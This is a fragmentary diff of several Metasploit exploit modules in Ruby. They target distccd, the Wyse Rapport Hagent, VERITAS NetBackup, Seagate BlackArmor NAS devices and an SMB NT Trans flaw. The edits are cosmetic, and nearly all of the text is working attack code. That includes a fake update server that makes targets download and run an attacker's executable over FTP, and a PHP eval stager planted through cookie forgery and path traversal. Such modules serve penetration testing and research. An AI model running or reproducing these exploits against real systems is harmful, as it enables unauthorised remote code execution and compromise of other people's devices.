||||
|
||||
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
||||
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
|
||||
|
||||
pkt['Payload'].v['ParamCountTotal'] =12000
|
||||
pkt['Payload'].v['DataCountTotal'] = body.length
|
||||
pkt['Payload'].v['ParamCountMax'] = 1024
|
||||
pkt['Payload'].v['DataCountMax'] = 65504
|
||||
pkt['Payload'].v['ParamCount'] = param.length
|
||||
pkt['Payload'].v['ParamOffset'] = param_offset
|
||||
pkt['Payload'].v['DataCount'] = body.length
|
||||
pkt['Payload'].v['DataOffset'] = data_offset
|
||||
pkt['Payload'].v['SetupCount'] = setup_count
|
||||
pkt['Payload'].v['SetupData'] = setup_data
|
||||
pkt['Payload'].v['Subcommand'] = subcommand
|
||||
|
||||
pkt['Payload'].v['Payload'] = data
|
||||
|
||||
self.simple.client.smb_send(pkt.to_s)
|
||||
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
|
||||
|
||||
#
|
||||
# Send a NTTrans secondary request with the magic displacement
|
||||
#
|
||||
|
||||
param = pattern
|
||||
body = ''
|
||||
data = param + body
|
||||
|
||||
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
|
||||
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
||||
|
||||
base_offset = pkt.to_s.length - 4
|
||||
param_offset = base_offset
|
||||
data_offset = param_offset + param.length
|
||||
|
||||
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
|
||||
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
||||
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
||||
pkt['Payload']['SMB'].v['WordCount'] = 18
|
||||
|
||||
pkt['Payload'].v['ParamCountTotal'] = param.length
|
||||
pkt['Payload'].v['DataCountTotal'] = body.length
|
||||
pkt['Payload'].v['ParamCount'] = param.length
|
||||
pkt['Payload'].v['ParamOffset'] = param_offset
|
||||
pkt['Payload'].v['ParamDisplace'] = targ_address
|
||||
pkt['Payload'].v['DataCount'] = body.length
|
||||
pkt['Payload'].v['DataOffset'] = data_offset
|
||||
|
||||
pkt['Payload'].v['Payload'] = data
|
||||
|
||||
self.simple.client.smb_send(pkt.to_s)
|
||||
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
|
||||
|
||||
|
||||
handler
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -1,9 +1,9 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: distcc_exec.rb 9669 2010-07-03 03:13:45Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -14,20 +14,21 @@ require 'msf/core'
|
|||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'DistCC Daemon Command Execution',
|
||||
'Description' => %q{
|
||||
This module uses a documented security weakness to execute
|
||||
arbitrary commands on any system running distccd.
|
||||
|
||||
|
||||
},
|
||||
'Author' => [ 'hdm' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 9669 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-2687'],
|
||||
|
@ -36,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
],
|
||||
'Platform' => ['unix'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => false,
|
||||
'Payload' =>
|
||||
{
|
||||
|
@ -48,16 +49,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl ruby bash telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
],
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Feb 01 2002'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(3632)
|
||||
], self.class)
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -65,23 +68,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
distcmd = dist_cmd("sh", "-c", payload.encoded);
|
||||
sock.put(distcmd)
|
||||
|
||||
|
||||
dtag = rand_text_alphanumeric(10)
|
||||
sock.put("DOTI0000000A#{dtag}\n")
|
||||
|
||||
|
||||
res = sock.get_once(24, 5)
|
||||
|
||||
|
||||
if !(res and res.length == 24)
|
||||
print_status("The remote distccd did not reply to our request")
|
||||
disconnect
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Check STDERR
|
||||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
|
@ -93,34 +97,35 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
res = sock.get_once(4, 5)
|
||||
res = sock.get_once(8, 5)
|
||||
len = [res].pack("H*").unpack("N")[0]
|
||||
|
||||
|
||||
return if not len
|
||||
if (len > 0)
|
||||
res = sock.get_once(len, 5)
|
||||
res.split("\n").each do |line|
|
||||
print_status("stdout: #{line}")
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
||||
|
||||
|
||||
|
||||
# Generate a distccd command
|
||||
def dist_cmd(*args)
|
||||
|
||||
|
||||
# Convince distccd that this is a compile
|
||||
args.concat(%w{# -c main.c -o main.o})
|
||||
|
||||
|
||||
# Set distcc 'magic fairy dust' and argument count
|
||||
res = "DIST00000001" + sprintf("ARGC%.8x", args.length)
|
||||
|
||||
|
||||
# Set the command arguments
|
||||
args.each do |arg|
|
||||
res << sprintf("ARGV%.8x%s", arg.length, arg)
|
||||
end
|
||||
|
||||
|
||||
return res
|
||||
end
|
||||
|
||||
end
|
||||
end
|
|
@ -1,35 +1,38 @@
|
|||
##
|
||||
# $Id: hagent_untrusted_hsdata.rb
|
||||
# $Id: hagent_untrusted_hsdata.rb 10998 2010-11-11 22:43:22Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'timeout'
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::FtpServer
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
|
||||
'Description' => %q{
|
||||
This module exploits the Wyse Rapport Hagent service by pretending to
|
||||
be a legitimate server. This process involves starting both HTTP and
|
||||
FTP services on the attacker side, then contacting the Hagent service of
|
||||
the target and indicating that an update is available. The target will
|
||||
then download the payload wrapped in an executable from the FTP service.
|
||||
This module exploits the Wyse Rapport Hagent service by pretending to
|
||||
be a legitimate server. This process involves starting both HTTP and
|
||||
FTP services on the attacker side, then contacting the Hagent service of
|
||||
the target and indicating that an update is available. The target will
|
||||
then download the payload wrapped in an executable from the FTP service.
|
||||
},
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Author' => 'kf',
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
'Version' => '$Revision: 10998 $',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2009-0695'],
|
||||
['OSVDB', '55839'],
|
||||
|
@ -39,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
|
||||
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 2048,
|
||||
|
@ -48,46 +52,46 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
{
|
||||
'EXITFUNC' => 'process',
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XPe x86',{'Platform' => 'win',}],
|
||||
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
|
||||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XPe x86',{'Platform' => 'win',}],
|
||||
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => true
|
||||
'DisclosureDate' => 'Jul 10 2009'
|
||||
))
|
||||
|
||||
register_options([
|
||||
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
|
||||
Opt::RPORT(80),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
|
||||
|
||||
if(datastore['SRVPORT'].to_i != 21)
|
||||
print_error("This exploit requires the FTP service to run on port 21")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
# Connect to the target service
|
||||
print_status("Connecting to the target")
|
||||
connect()
|
||||
|
||||
|
||||
# Start the FTP service
|
||||
print_status("Starting the FTP server")
|
||||
start_service()
|
||||
|
||||
|
||||
# Create the executable with our payload
|
||||
print_status("Generating the EXE")
|
||||
@exe_file = generate_payload_exe
|
||||
if target['Platform'] == 'win'
|
||||
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
|
||||
maldir = "C:\\" # Windows
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
|
||||
co = "XP"
|
||||
elsif target['Platform'] == 'linux'
|
||||
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
|
||||
maldir = "//tmp//" # Linux
|
||||
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
|
||||
co = "LXS"
|
||||
|
@ -102,113 +106,122 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'MsfExploit' => self
|
||||
}
|
||||
})
|
||||
|
||||
|
||||
# Let this close automatically
|
||||
add_socket(wdmserver)
|
||||
|
||||
wdmserver_port = wdmserver.getsockname[2]
|
||||
print_status("Starting the HTTP service on port #{wdmserver_port}")
|
||||
|
||||
|
||||
|
||||
|
||||
fakerapport = Rex::Socket.source_address(rhost)
|
||||
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
|
||||
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
|
||||
|
||||
# FTP Credentials
|
||||
# FTP Credentials
|
||||
ftpserver = Rex::Socket.source_address(rhost)
|
||||
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
|
||||
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
|
||||
ftpport = 21
|
||||
ftpsecure = '0'
|
||||
|
||||
incr = 10
|
||||
pwn1 =
|
||||
"&UP0|&SI=1|UR=9" +
|
||||
"|CO \x0f#{co}\x0f|#{incr}" +
|
||||
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
|
||||
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
|
||||
incr = 10
|
||||
pwn1 =
|
||||
"&UP0|&SI=1|UR=9" +
|
||||
"|CO \x0f#{co}\x0f|#{incr}" +
|
||||
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
|
||||
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
|
||||
|
||||
pwn2 =
|
||||
"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
|
||||
pwn2 = "|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
|
||||
|
||||
pwn3 =
|
||||
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# "|RB|#{incr+1}" +
|
||||
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
|
||||
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# FTP Paramaters
|
||||
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
|
||||
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
|
||||
# No clue
|
||||
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
pwn3 =
|
||||
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# "|RB|#{incr+1}" +
|
||||
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
|
||||
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
|
||||
# FTP Paramaters
|
||||
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" +
|
||||
"|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
|
||||
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" +
|
||||
"|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
|
||||
# No clue
|
||||
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
|
||||
if target['Platform'] == 'win'
|
||||
pwn = pwn1 + pwn3
|
||||
pwn = pwn1 + pwn3
|
||||
elsif target['Platform'] == 'linux'
|
||||
pwn = pwn1 + pwn2 + pwn3
|
||||
pwn = pwn1 + pwn2 + pwn3
|
||||
end
|
||||
# Send the malicious request
|
||||
sock.put(mal)
|
||||
|
||||
|
||||
# Download some response data
|
||||
resp = sock.get_once(-1, 10)
|
||||
print_status("Received: " + resp)
|
||||
|
||||
resp = sock.get_once(-1, 10)
|
||||
print_status("Received: #{resp}")
|
||||
|
||||
if not resp
|
||||
print_error("No reply from the target, this may not be a vulnerable system")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Waiting on a connection to the HTTP service")
|
||||
begin
|
||||
Timeout.timeout(190) do
|
||||
done = false
|
||||
while (not done and session = wdmserver.accept)
|
||||
req = session.recvfrom(2000)[0]
|
||||
next if not req
|
||||
next if req.empty?
|
||||
print_status("HTTP Request: #{req.split("\n")[0].strip}")
|
||||
|
||||
case req
|
||||
when /V01/
|
||||
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
|
||||
res = pwn
|
||||
when /V02/
|
||||
print_status("++ device sending V02 query...")
|
||||
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
done = true
|
||||
|
||||
when /V55/
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
when /POST/ # PUT is used for non encrypted requests.
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
done = true
|
||||
else
|
||||
print_status("+++ sending generic response...")
|
||||
res = pwn
|
||||
done = false
|
||||
while (not done and session = wdmserver.accept)
|
||||
req = session.recvfrom(2000)[0]
|
||||
next if not req
|
||||
next if req.empty?
|
||||
print_status("HTTP Request: #{req.split("\n")[0].strip}")
|
||||
|
||||
case req
|
||||
when /V01/
|
||||
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
|
||||
res = pwn
|
||||
when /V02/
|
||||
print_status("++ device sending V02 query...")
|
||||
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
|
||||
done = true
|
||||
|
||||
when /V55/
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
when /POST/ # PUT is used for non encrypted requests.
|
||||
print_status("++ device sending V55 query...")
|
||||
res = pwn
|
||||
done = true
|
||||
else
|
||||
print_status("+++ sending generic response...")
|
||||
res = pwn
|
||||
end
|
||||
|
||||
print_status("Sending reply: #{res}")
|
||||
session.put(res)
|
||||
session.close
|
||||
end
|
||||
|
||||
print_status("Sending reply: #{res}")
|
||||
session.put(res)
|
||||
session.close
|
||||
end
|
||||
end
|
||||
rescue ::TimeoutError
|
||||
rescue ::Timeout::Error
|
||||
print_status("Timed out waiting on the HTTP request")
|
||||
wdmserver.close
|
||||
disconnect()
|
||||
stop_service()
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
print_status("Waiting on the FTP request...")
|
||||
stime = Time.now.to_f
|
||||
while(not @exe_sent)
|
||||
break if (stime + 90 < Time.now.to_f)
|
||||
select(nil, nil, nil, 0.25)
|
||||
select(nil, nil, nil, 0.25)
|
||||
end
|
||||
|
||||
|
||||
if(not @exe_sent)
|
||||
print_status("No executable sent :(")
|
||||
end
|
||||
|
||||
|
||||
stop_service()
|
||||
wdmserver.close()
|
||||
|
||||
|
||||
handler
|
||||
disconnect
|
||||
end
|
||||
|
@ -220,14 +233,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
c.put("425 Can't build data connection\r\n")
|
||||
return
|
||||
end
|
||||
|
||||
|
||||
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
|
||||
conn.put(@exe_file)
|
||||
c.put("226 Transfer complete.\r\n")
|
||||
conn.close
|
||||
@exe_sent = true
|
||||
end
|
||||
|
||||
|
||||
def on_client_command_size(c,arg)
|
||||
print_status("#{@state[c][:name]} FTP size request for #{arg}")
|
||||
c.put("213 #{@exe_file.length}\r\n")
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
##
|
||||
# $Id$
|
||||
# $Id: veritas_netbackup_cmdexec.rb 10617 2010-10-09 06:55:52Z jduck $
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -12,14 +12,15 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(update_info(info,
|
||||
'Name' => 'VERITAS NetBackup Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module allows arbitrary command execution on an
|
||||
This module allows arbitrary command execution on an
|
||||
ephemeral port opened by Veritas NetBackup, whilst an
|
||||
administrator is authenticated. The port is opened and
|
||||
allows direct console access as root or SYSTEM from
|
||||
|
@ -27,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'patrick' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision$',
|
||||
'Version' => '$Revision: 10617 $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2004-1389' ],
|
||||
|
@ -50,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'RequiredCmd' => 'generic perl telnet',
|
||||
}
|
||||
},
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
['Automatic', { }],
|
||||
],
|
||||
|
@ -86,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
sock.put(buf)
|
||||
res = sock.get(-1,3)
|
||||
|
||||
|
||||
print_status("#{res}")
|
||||
|
||||
handler
|
||||
|
|
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
require 'rexml/document'
|
||||
|
||||
class Metasploit4 < Msf::Exploit::Remote
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
@ -22,7 +22,6 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
without the need for authentication. The cookie can be easily decrypted using a
|
||||
known static encryption key and re-encrypted once the PHP object string has been
|
||||
modified.
|
||||
|
||||
This module has been tested on the STBN300 device.
|
||||
},
|
||||
'Author' => [
|
||||
|
@ -87,7 +86,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
headers = res.to_s
|
||||
|
||||
# validate headers
|
||||
if headers.incude?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
if headers.include?('X-Powered-By: PHP/5.2.13') && headers.include?('Server: lighttpd/1.4.28')
|
||||
# and make sure that the body contains the title we'd expect
|
||||
if res.body.include?('Login to BlackArmor')
|
||||
return Exploit::CheckCode::Appears
|
||||
|
@ -109,7 +108,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
# Step 1 - Establish a session with the target which will give us a PHP object we can
|
||||
# work with.
|
||||
begin
|
||||
print_status("#{peer} - Establishing session with target ...")
|
||||
print_status("Establishing session with target ...")
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri),
|
||||
'method' => 'GET',
|
||||
|
@ -121,21 +120,21 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
if res && res.code == 200 && res.to_s =~ /#{datastore['COOKIEID']}=([^;]+);/
|
||||
cookie_value = $1.strip
|
||||
else
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
# Step 2 - Decrypt the cookie so that we have a PHP object we can work with directly
|
||||
# then update it so that it's an admin session before re-encrypting
|
||||
print_status("#{peer} - Upgrading session to administrator ...")
|
||||
print_status("Upgrading session to administrator ...")
|
||||
php_object = decode_cookie(cookie_value)
|
||||
vprint_status("#{peer} - PHP Object: #{php_object}")
|
||||
vprint_status("PHP Object: #{php_object}")
|
||||
|
||||
admin_php_object = set_string(php_object, 'is_admin', 'yes')
|
||||
admin_php_object = set_string(admin_php_object, 'username', datastore['ADMINACCOUNT'])
|
||||
vprint_status("#{peer} - Admin PHP object: #{admin_php_object}")
|
||||
vprint_status("Admin PHP object: #{admin_php_object}")
|
||||
|
||||
admin_cookie_value = encode_cookie(admin_php_object)
|
||||
|
||||
|
@ -146,7 +145,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
config_time = ::Time.now.to_i
|
||||
|
||||
begin
|
||||
print_status("#{peer} - Extracting existing host configuration ...")
|
||||
print_status("Extracting existing host configuration ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/get_general_setup'),
|
||||
'method' => 'GET',
|
||||
|
@ -167,14 +166,14 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
else
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unexpected response from server.")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Unable to establish connection.")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Host configuration extracted.")
|
||||
vprint_status("#{peer} - Host configuration: #{host_config}")
|
||||
print_good("Host configuration extracted.")
|
||||
vprint_status("Host configuration: #{host_config}")
|
||||
|
||||
# Step 4 - replace the host device description with a custom payload that can
|
||||
# be used for LFI. We have to keep the payload small because of size limitations
|
||||
|
@ -191,7 +190,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
installer = "file_put_contents('#{payload_file}', base64_decode($_POST['#{param_id}']));"
|
||||
stager = Rex::Text.encode_base64(installer)
|
||||
stager = xml_encode("<?php eval(base64_decode('#{stager}')); ?>")
|
||||
vprint_status("#{peer} - Stager: #{stager}")
|
||||
vprint_status("Stager: #{stager}")
|
||||
|
||||
# Butcher the XML directly rather than attempting to use REXML. The target XML
|
||||
# parser is way to simple/flaky to deal with the proper stuff that REXML
|
||||
|
@ -203,7 +202,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
vprint_status(xml_payload)
|
||||
|
||||
# Step 5 - set the host description to the stager so that it is written to disk
|
||||
print_status("#{peer} - Uploading stager ...")
|
||||
print_status("Uploading stager ...")
|
||||
begin
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
|
@ -221,16 +220,16 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
unless res && res.code == 200
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (invalid result).")
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
fail_with(Exploit::Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
fail_with(Failure::Unreachable, "#{peer} - Stager upload failed (unable to establish connection).")
|
||||
end
|
||||
|
||||
print_good("#{peer} - Stager uploaded.")
|
||||
print_good("Stager uploaded.")
|
||||
|
||||
# Step 6 - Invoke the stage, passing in a self-deleting php script body.
|
||||
print_status("#{peer} - Executing stager ...")
|
||||
print_status("Executing stager ...")
|
||||
payload_php_object = set_string(php_object, 'language', "../../../etc/devicedesc\x00")
|
||||
payload_cookie_value = encode_cookie(payload_php_object)
|
||||
self_deleting_payload = "<?php unlink(__FILE__);\r\n#{payload.encoded}; ?>"
|
||||
|
@ -250,20 +249,20 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
)
|
||||
|
||||
if res && res.code == 200
|
||||
print_good("#{peer} - Stager execution succeeded, payload ready for execution.")
|
||||
print_good("Stager execution succeeded, payload ready for execution.")
|
||||
else
|
||||
print_error("#{peer} - Stager execution failed (invalid result).")
|
||||
print_error("Stager execution failed (invalid result).")
|
||||
errored = true
|
||||
end
|
||||
rescue Rex::ConnectionRefused, Rex::ConnectionTimeout, Rex::HostUnreachable
|
||||
print_error("#{peer} - Stager execution failed (unable to establish connection).")
|
||||
print_error("Stager execution failed (unable to establish connection).")
|
||||
errored = true
|
||||
end
|
||||
|
||||
# Step 7 - try to restore the previous configuration, allowing exceptions
|
||||
# to bubble up given that we're at the end. This step is important because
|
||||
# we don't want to leave a trail of junk on disk at the end.
|
||||
print_status("#{peer} - Restoring host config ...")
|
||||
print_status("Restoring host config ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, 'index.php/mv_system/set_general_setup'),
|
||||
'method' => 'POST',
|
||||
|
@ -281,7 +280,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
# Step 8 - invoke the installed payload, but only if all went to plan.
|
||||
unless errored
|
||||
print_status("#{peer} - Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
print_status("Executing payload at #{normalize_uri(target_uri, payload_file)} ...")
|
||||
res = send_request_cgi(
|
||||
'uri' => normalize_uri(target_uri, payload_file),
|
||||
'method' => 'GET',
|
||||
|
@ -325,7 +324,7 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
|
||||
cookie_value = xor(block, datastore['XORKEY'])
|
||||
cookie_value = CGI.escape(Rex::Text.encode_base64(cookie_value))
|
||||
vprint_status("#{peer} - Cookie value: #{cookie_value}")
|
||||
vprint_status("Cookie value: #{cookie_value}")
|
||||
|
||||
cookie_value
|
||||
end
|
||||
|
|
|
@ -1,3 +1,14 @@
|
|||
##
|
||||
# $Id: audio_wkstn_pls.rb 10477 2010-09-25 11:59:02Z mc $
|
||||
##
|
||||
|
||||
##
|
||||
